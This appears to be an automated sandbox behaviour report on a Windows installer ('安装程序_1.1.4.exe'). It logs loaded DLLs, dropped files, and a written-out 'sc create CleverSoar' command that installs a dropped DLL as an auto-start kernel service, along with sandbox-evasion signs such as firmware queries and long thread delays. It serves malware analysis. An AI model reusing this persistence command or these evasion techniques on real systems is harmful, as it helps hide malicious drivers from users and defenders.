Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Static file information: File size 7237925 > 1048576
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1798230293.0000000003090000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1798079649.0000000004010000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00D257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00D257D0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x34384b
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.dr Static PE information: real checksum: 0x0 should be: 0x34384b
Source: update.vbc.6.dr Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: update.vbc.1.dr Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Static PE information: real checksum: 0x0 should be: 0x6ea786
Source: hrsw.vbc.6.dr Static PE information: real checksum: 0x0 should be: 0x3789ec
Source: tProtect.dll.12.dr Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Static PE information: section name: .didata
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.0.dr Static PE information: section name: .didata
Source: update.vbc.1.dr Static PE information: section name: .00cfg
Source: update.vbc.1.dr Static PE information: section name: .voltbl
Source: update.vbc.1.dr Static PE information: section name: .aQ#
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp.5.dr Static PE information: section name: .didata
Source: 7zr.exe.6.dr Static PE information: section name: .sxdata
Source: update.vbc.6.dr Static PE information: section name: .00cfg
Source: update.vbc.6.dr Static PE information: section name: .voltbl
Source: update.vbc.6.dr Static PE information: section name: .aQ#
Source: hrsw.vbc.6.dr Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr Static PE information: section name: .aQ#
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Code function: 6_2_6C0FBDDB push ecx; ret 6_2_6C0FBDEE
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Code function: 6_2_6BFA0F00 push ss; retn 0001h 6_2_6BFA0F0A
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Code function: 6_2_6C1C9F10 push eax; ret 6_2_6C1C9F2E
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Code function: 6_2_6C12E9F4 push 004AC35Ch; ret 6_2_6C12EA0E
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Code function: 6_2_6C1CA290 push eax; ret 6_2_6C1CA2BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00CA45F4 push 00D4C35Ch; ret 10_2_00CA460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00D3FB10 push eax; ret 10_2_00D3FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00D3FE90 push eax; ret 10_2_00D3FEBE
Source: update.vbc.1.dr Static PE information: section name: .aQ# entropy: 7.189081398239323
Source: update.vbc.6.dr Static PE information: section name: .aQ# entropy: 7.189081398239323
Source: hrsw.vbc.6.dr Static PE information: section name: .aQ# entropy: 7.189081398239323
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe File created: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbc
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe File created: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp File created: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\_isetup\_setup64.tmp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (10 occurrences)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3274
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Window / User API: threadDelayed 540
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Window / User API: threadDelayed 604
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Window / User API: threadDelayed 521
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BULE6.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-96EUT.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NFHOR.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe; API coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (31 occurrences)
Source: C:\Users\user\AppData\Local\Temp\is-CUPF8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.4.tmp; Code function: 6_2_6C0EE090 FindFirstFileA,FindClose,FindClose, 6_2_6C0EE090
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CA6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00CA6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CA7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00CA7496
